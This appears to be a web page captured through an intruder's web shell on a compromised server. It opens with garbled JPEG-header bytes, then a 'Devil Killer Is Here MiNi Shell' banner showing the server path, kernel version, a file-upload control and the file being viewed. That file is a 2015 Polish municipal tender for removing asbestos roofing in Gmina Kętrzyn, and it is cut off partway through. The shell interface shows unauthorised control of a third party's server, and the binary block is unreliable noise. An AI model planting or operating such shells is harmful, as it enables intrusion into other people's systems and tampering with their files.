JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150512/110234-N-2015.html

<p class="kh_header"><b>Kętrzyn: Usuwanie wyrobów zawierających azbest z terenu Gminy Kętrzyn.</b><br>
<b>Numer ogłoszenia: 110234 - 2015; data zamieszczenia: 12.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kętrzyn , ul. Kościuszki 2, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7512474 w. 17, faks 089 7512746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie wyrobów zawierających azbest z terenu Gminy Kętrzyn..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.

 1.1 Demontaż, transport i unieszkodliwienie pokrycia dachowego wykonanego z płyt falistych azbestowo-cementowych  w ilości około 114,3 ton.
 W ramach zamówienia wykonane zostaną przez wykonawcę : 
    - demontaż pokrycia dachowego z obiektów wskazanych w załączniku Nr 6 do SIWZ;           
     - pakowanie, załadunek, transport odpadu niebezpiecznego z miejsca zbiórki do miejsca unieszkodliwiania, rozładunek i składowanie wraz z kosztami unieszkodliwienia na składowisku odpadów niebezpiecznych zawierających azbest oraz prowadzenie ilościowej i jakościowej ewidencji odpadów określonej w ustawie z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21z pózn. zm.) z zastosowaniem wzorów dokumentów (karta przeka-zania odpadu) określonych rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2014r., poz. 1973).

1.2 Transport i unieszkodliwianie pokrycia dachowego wykonanego z płyt falistych azbestowo-cementowych  w ilości około 18,4 ton.
W ramach zamówienia wykonane zostaną przez wykonawcę : 
  - pakowanie, załadunek, transport odpadu niebezpiecznego z miejsc zbiórki wskazanych     w załączniku Nr 6 do SIWZ do miejsca  unieszkodliwiania;
  -  rozładunek i zdeponowanie wraz z kosztami unieszkodliwienia na składowisku odpadów niebezpiecznych zawierających azbest oraz prowadzenie ilościowej i jakościowej ewidencji odpadów określonej w ustawie z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21 z pózn. zm.) z zastosowaniem wzorów dokumentów (karta przekazania odpadu) określonych rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2014r., poz. 1973).

2. Zamawiający zastrzega sobie prawo :
- zmiany liczby nieruchomości objętych zamówieniem;
- zmniejszenia ilości usuwanych  wyrobów zawierających azbest;
- zwiększenia ilości usuwanych  wyrobów zawierających azbest, w granicach 
20 % .

3.  Wynagrodzenie wykonawcy zostanie wyliczone z zastosowaniem stawek zawartych w ofercie wykonawcy.

4. Wykonawca w ramach ceny ofertowej zapewnia również:
-  sporządzenie planu pracy i planu bezpieczeństwa i ochrony zdrowia przed przystąpieniem do wykonania przedmiotu umowy,
-  zgłoszenie zamiaru przystąpienia do wykonywania prac  właściwemu organowi nadzoru budowlanego, właściwemu okręgowemu inspektorowi pracy oraz właściwemu państwowemu inspektorowi sanitarnemu,   w terminie co najmniej 7 dni przed rozpoczęciem prac (zgłoszenia wraz z wymaganymi przez w/w organy dokumentami);
-  warunki bezpiecznego usuwania i transportu wyrobów zawierających azbest, zgodnie  z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 2 kwietnia 2004 r. (Dz.U. Nr 71 z 2014r., poz. 649)  w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest,
-  nadzór osoby odpowiedzialnej za organizację wykonywanych robót i zabezpieczenie terenu robót,
- uporządkowanie terenu po zakończeniu robót oraz wypłatę odszkodowań w przypadku wyrządzenia szkód.
 
5.Wykonawca zobowiązany jest dysponować odpowiednim wyposażeniem technicznym oraz osobami przeszkolonymi w zakresie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest.

6. Wykonawca ustali szczegółowe terminy wykonania zamówienia z właścicielami lub zarządcami nieruchomości.

7. Po wykonaniu prac wykonawca ma obowiązek złożenia właścicielowi/administratorowi nieruchomości  pisemnego oświadczenia o prawidłowości wykonania prac oraz o oczyszczeniu terenu z pyłu azbestowego z zachowaniem właściwych przepisów technicznych i sanitarnych. 

8. Wykonawca dokonuje ważenia wyrobów zawierających azbest i z tej czynności sporządza protokół zawierający co najmniej następujące informacje: imię i nazwisko właściciela/administratotra nieruchomości, od którego odbierane są odpady zawierające azbest, adres nieruchomości, z której następuje odbiór odpadów, datę odbioru, ilość odebranych odpadów  w Mg , potwierdzenie wykonania usługi przez właściciela/administratora nieruchomości lub wyjaśnienie wykonawcy dotyczące odmowy  takiego potwierdzenia  przez właściciela/administratora  nieruchomości.
    W przypadku uznania zasadności odmowy  powyższego potwierdzenia  przez właściciela/administratora  nieruchomości zamawiającemu przysługuje prawo odmowy wypłaty wynagrodzenia za realizację zakwestionowanego zakresu prac.


9. Wykonawca dostarcza Zamawiającemu potwierdzenie przyjęcia odpadu od właściciela nieruchomości, dokumenty potwierdzające przyjęcie odpadów na składowisko posiadające zezwolenie na przyjmowanie odpadów zawierających azbest - miejsce unieszkodliwienia (karta przekazania odpadu), protokół o którym mowa w ust. 8.

10. Zamówienie należy wykonać zgodnie z obowiązującymi w tym zakresie przepisami. 

11. CPV :     90600000-3  Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane
                  90650000-8  Usługi usuwania azbestu 
                  90512000-9  Usługi transportu odpadów
                  45262660-5  Usuwanie azbestu. 

12. Zamawiający nie przewiduje udzielenia zamówień uzupełniających..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8, 90.60.00.00-3, 90.51.20.00-9, 45.26.26.60-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie spełniony jeżeli Wykonawca wykaże, że posiada zezwolenie na prowadzenie działalności w zakresie transportu odpadów zawierających azbest wydane na podstawie ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2010r. Nr 185, poz. 1243 z poźn. zm.) lub ustawy z dnia 14 grudnia 2012r. o odpadach (Dz. U. 2013. poz. 21 z późn. zm.);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 1  do SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 1  do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie spełniony jeżeli Wykonawca wykaże, że osoby, które będą uczestniczyć w wykonaniu zamówienia zostały przeszkolone w zakresie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 1  do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty potwierdzające ukończenie szkolenia/seminarium/kursu w sprawie zasad BHP
przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.98</li>
<li>2 - Termin realizacji - 0.02</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Za zgodą stron umowy dopuszcza się wydłużenie terminu realizacji zamówienia,
wynikające z uzasadnionego wniosku właściciela/administratora nieruchomości.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/ketrzyn_gmina_wiejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2015 godzina 10:00, miejsce: Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> dofinansowanie z WFOŚiGW w Olsztynie;.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Demontaż, transport i unieszkodliwienie wyrobów zawierających azbest..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.

 Demontaż, transport i unieszkodliwienie pokrycia dachowego wykonanego z płyt falistych azbestowo-cementowych  w ilości około 114,3 ton.
 W ramach zamówienia wykonane zostaną przez wykonawcę : 
    - demontaż pokrycia dachowego z obiektów wskazanych w załączniku Nr 6 do SIWZ;           
     - pakowanie, załadunek, transport odpadu niebezpiecznego z miejsca zbiórki do miejsca unieszkodliwiania, rozładunek i składowanie wraz z kosztami unieszkodliwienia na składowisku odpadów niebezpiecznych zawierających azbest oraz prowadzenie ilościowej i jakościowej ewidencji odpadów określonej w ustawie z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21z pózn. zm.) z zastosowaniem wzorów dokumentów (karta przeka-zania odpadu) określonych rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2014r., poz. 1973).

2. Zamawiający zastrzega sobie prawo :
- zmiany liczby nieruchomości objętych zamówieniem;
- zmniejszenia ilości usuwanych  wyrobów zawierających azbest;
- zwiększenia ilości usuwanych  wyrobów zawierających azbest, w granicach 20 % .

3.  Wynagrodzenie wykonawcy zostanie wyliczone z zastosowaniem stawek zawartych w ofercie wykonawcy.

4. Wykonawca w ramach ceny ofertowej zapewnia również:
-  sporządzenie planu pracy i planu bezpieczeństwa i ochrony zdrowia przed przystąpieniem do wykonania przedmiotu umowy,
-  zgłoszenie zamiaru przystąpienia do wykonywania prac  właściwemu organowi nadzoru budowlanego, właściwemu okręgowemu inspektorowi pracy oraz właściwemu państwowemu inspektorowi sanitarnemu,   w terminie co najmniej 7 dni przed rozpoczęciem prac (zgłoszenia wraz z wymaganymi przez w/w organy dokumentami);
-  warunki bezpiecznego usuwania i transportu wyrobów zawierających azbest, zgodnie          z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia
2 kwietnia 2004 r. (Dz.U. Nr 71 z 2014r., poz. 649)  w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest,
-  nadzór osoby odpowiedzialnej za organizację wykonywanych robót i zabezpieczenie terenu robót,
- uporządkowanie terenu po zakończeniu robót oraz wypłatę odszkodowań w przypadku wyrządzenia szkód.
 
5.Wykonawca zobowiązany jest dysponować odpowiednim wyposażeniem technicznym oraz osobami przeszkolonymi w zakresie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest.

6. Wykonawca ustali szczegółowe terminy wykonania zamówienia z właścicielami lub zarządcami nieruchomości.

7. Po wykonaniu prac wykonawca ma obowiązek złożenia właścicielowi/administratorowi nieruchomości  pisemnego oświadczenia o prawidłowości wykonania prac oraz o oczyszczeniu terenu z pyłu azbestowego z zachowaniem właściwych przepisów technicznych        i sanitarnych. 

8. Wykonawca dokonuje ważenia wyrobów zawierających azbest i z tej czynności sporządza protokół zawierający co najmniej następujące informacje: imię i nazwisko właściciela/admi-nistratotra nieruchomości, od którego odbierane są odpady zawierające azbest, adres nieru-chomości, z której następuje odbiór odpadów, datę odbioru, ilość odebranych odpadów         w Mg , potwierdzenie wykonania usługi przez właściciela/administratora nieruchomości lub wyjaśnienie wykonawcy dotyczące odmowy  takiego potwierdzenia  przez właściciela/admi-nistratora  nieruchomości.
    W przypadku uznania zasadności odmowy  powyższego potwierdzenia  przez właści-ciela/administratora  nieruchomości zamawiającemu przysługuje prawo odmowy wypłaty wynagrodzenia za realizację zakwestionowanego zakresu prac.

9. Wykonawca dostarcza Zamawiającemu potwierdzenie przyjęcia odpadu od właściciela nieruchomości, dokumenty potwierdzające przyjęcie odpadów na składowisko posiadające zezwolenie na przyjmowanie odpadów zawierających azbest - miejsce unieszkodliwienia (karta przekazania odpadu), protokół o którym mowa w ust. 8.

10. Zamówienie należy wykonać zgodnie z obowiązującymi w tym zakresie przepisami. 

11. CPV :     90600000-3  Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane
                  90650000-8  Usługi usuwania azbestu 
                  90512000-9  Usługi transportu odpadów
                  45262660-5  Usuwanie azbestu. 

12. Zamawiający nie przewiduje udzielenia zamówień uzupełniających..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8, 90.60.00.00-3, 90.51.20.00-9, 45.26.26.60-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.98</li>
<li>2. Termin realizacji - 0.02</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Transport i unieszkodliwianie wyrobów zawierających azbest..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.    

Transport i unieszkodliwianie pokrycia dachowego wykonanego z płyt falistych azbestowo-cementowych  w ilości około 18,4 ton.
W ramach zamówienia wykonane zostaną przez wykonawcę : 
  - pakowanie, załadunek, transport odpadu niebezpiecznego z miejsc zbiórki wskazanych     w załączniku Nr 6 do SIWZ do miejsca  unieszkodliwiania;
  -  rozładunek i zdeponowanie wraz z kosztami unieszkodliwienia na składowisku odpadów niebezpiecznych zawierających azbest oraz prowadzenie ilościowej i jakościowej ewidencji odpadów określonej w ustawie z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21
z pózn. zm.) z zastosowaniem wzorów dokumentów (karta przekazania odpadu) określonych rozporzą-dzeniem Ministra Środowiska z dnia 12 grudnia 2014r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2014r., poz. 1973).

2. Zamawiający zastrzega sobie prawo :
- zmiany liczby nieruchomości objętych zamówieniem;
- zmniejszenia ilości usuwanych  wyrobów zawierających azbest;
- zwiększenia ilości usuwanych  wyrobów zawierających azbest, w granicach 20 % .

3.  Wynagrodzenie wykonawcy zostanie wyliczone z zastosowaniem stawek zawartych w ofercie wykonawcy.

4. Wykonawca w ramach ceny ofertowej zapewnia również:
-  sporządzenie planu pracy i planu bezpieczeństwa i ochrony zdrowia przed przystąpieniem do wykonania przedmiotu umowy,
-  zgłoszenie zamiaru przystąpienia do wykonywania prac  właściwemu organowi nadzoru budowlanego, właściwemu okręgowemu inspektorowi pracy oraz właściwemu państwowemu inspektorowi sanitarnemu,   w terminie co najmniej 7 dni przed rozpoczęciem prac (zgłoszenia wraz z wymaganymi przez w/w organy dokumentami);
-  warunki bezpiecznego usuwania i transportu wyrobów zawierających azbest, zgodnie          z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia
2 kwietnia 2004 r. (Dz.U. Nr 71 z 2014r., poz. 649)  w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest,
-  nadzór osoby odpowiedzialnej za organizację wykonywanych robót i zabezpieczenie terenu robót,
- uporządkowanie terenu po zakończeniu robót oraz wypłatę odszkodowań w przypadku wyrządzenia szkód.
 
5.Wykonawca zobowiązany jest dysponować odpowiednim wyposażeniem technicznym oraz osobami przeszkolonymi w zakresie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest.

6. Wykonawca ustali szczegółowe terminy wykonania zamówienia z właścicielami lub zarządcami nieruchomości.

7. Po wykonaniu prac wykonawca ma obowiązek złożenia właścicielowi/administratorowi nieruchomości  pisemnego oświadczenia o prawidłowości wykonania prac oraz o oczyszczeniu terenu z pyłu azbestowego z zachowaniem właściwych przepisów technicznych        i sanitarnych. 

8. Wykonawca dokonuje ważenia wyrobów zawierających azbest i z tej czynności sporządza protokół zawierający co najmniej następujące informacje: imię i nazwisko właściciela/administratotra nieruchomości, od którego odbierane są odpady zawierające azbest, adres nieru-chomości, z której następuje odbiór odpadów, datę odbioru, ilość odebranych odpadów  w Mg , potwierdzenie wykonania usługi przez właściciela/administratora nieruchomości lub wyjaśnienie wykonawcy dotyczące odmowy  takiego potwierdzenia  przez właściciela/admi-nistratora  nieruchomości.
    W przypadku uznania zasadności odmowy  powyższego potwierdzenia  przez właściciela/administratora  nieruchomości zamawiającemu przysługuje prawo odmowy wypłaty wynagrodzenia za realizację zakwestionowanego zakresu prac.


